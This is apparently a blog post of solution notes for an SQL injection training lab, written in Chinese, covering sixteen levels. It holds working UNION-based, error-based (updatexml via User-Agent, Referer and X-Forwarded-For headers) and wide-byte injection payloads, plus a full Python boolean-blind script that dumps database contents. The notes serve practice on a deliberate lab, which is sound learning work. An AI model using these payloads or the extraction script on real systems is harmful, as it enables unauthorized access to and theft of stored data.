Sql-Labs 练习

http://inject2.lab.aqlab.cn:81/

pass-01

union select 1,database(),3
# error

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='error'
# error_flag,user

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='error_flag'
# Id,flag

union select 1,group_concat(flag),3 from error_flag
# Your Login name:zKaQ-Nf,zKaQ-BJY,zKaQ-XiaoFang,zKaq-98K

pass0x2 字符型

http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union select 1,2,'3

http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union select 1,database(),'3
# error

http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='error
# error_flag,user

http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='error_flag
# Id,flag

http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union select 1,group_concat(flag),3 from error_flag %23
# zKaQ-Nf,zKaQ-BJY,zKaQ-XiaoFang,zKaq-98K

pass0x3

('1') 拼接

pass0x4

("1") 拼接

http://inject2.lab.aqlab.cn:81/Pass-04/index.php?id=1") union select 1,group_concat(flag),3 from error_flag %23

pass0x5

union select 1,database(),3 #
#post_error

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='post_error'#
#flag,user

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'#
#Id,flag

union select 1,group_concat(flag),3 from flag #
#Id,flag

pass0x6

("123") 拼接

pass-07

爆破用户名密码后,根据源码提示在header中useragent处,进行报错注入

'or updatexml(1,concat(0x7e,user()),1),1)#
'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),1)#
'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag_head')),1),1)#
'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#

pass-08

注入点变成refer了。

pass-09

注入点变成x-forward了。

pass-10 布尔盲注

import sys
import time
from requests_html import AsyncHTMLSession, HTMLSession

start_time = time.time()

session = HTMLSession()
proxies = {}

url = 'http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1'
flag_success = '有数据'

payload1_database_length = ' and length(database())={}'
payload_database = ' and ord(substr(database(),{},1))>{}'
payload_table =  ' and ord( SUBSTR((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{}'
payload_column =  ' and ord( SUBSTR((select group_concat(column_name) from information_schema.columns where table_name="{}"),{},1))>{}'
payload_data =  ' and ord( SUBSTR((select group_concat({column_name}) from {table_name}),{},1))>{}'


def database_length():
    for i in range(128):
        sql = url + payload1_database_length.format(i)
        res = session.get(sql)
        if flag_success in res.text:
            print('database length = ', i)
            break


def database():
    db = ''
    for i in range(1, 128):
        s = search(i, payload_database)
        if not 32 < ord(s) <= 128:
            break
        db += s
        print('database = ', db)


def search(index, payload):
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:
        sql = url + payload.format(index, mid)
        res = session.get(sql)
        if flag_success in res.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2

        if mid == 32:
            break
    return chr(mid)


def table():
    db = ''
    for i in range(1, 128):
        s = search(i, payload_table)
        if not 32 < ord(s) <= 128:
            break
        db += s
        print('table = ', db)


def column(table_name):
    db = ''
    for i in range(1, 128):
        s = search(i, payload_column.format(table_name, '{}', '{}'))
        if not 32 < ord(s) <= 128:
            break
        db += s
        print('column = ', db)


def data(column_name, table_name):
    db = ''
    for i in range(1, 128):
        s = search(i, payload_data.format('{}', '{}', column_name=column_name, table_name=table_name))
        if not 32 < ord(s) <= 128:
            break
        db += s
        print('data = ', db)

if __name__ == '__main__':
    # database_length()
    # database()          # 'kanwolongxia'
    # table()             # 'loflag'
    # column('loflag')      # Id,flaglo
    data('flaglo','loflag')      # Id,flaglo
    print("--- %s seconds ---" % (time.time() - start_time))

pass-0x15

宽字节注入

id=1%df' union select 1,database(),3%23

pass-0x16

宽字节注入

id=1%df") union select 1,database(),3%23
posted @ 2021-08-23 15:15  wgf4242  阅读(53)  评论(0编辑  收藏  举报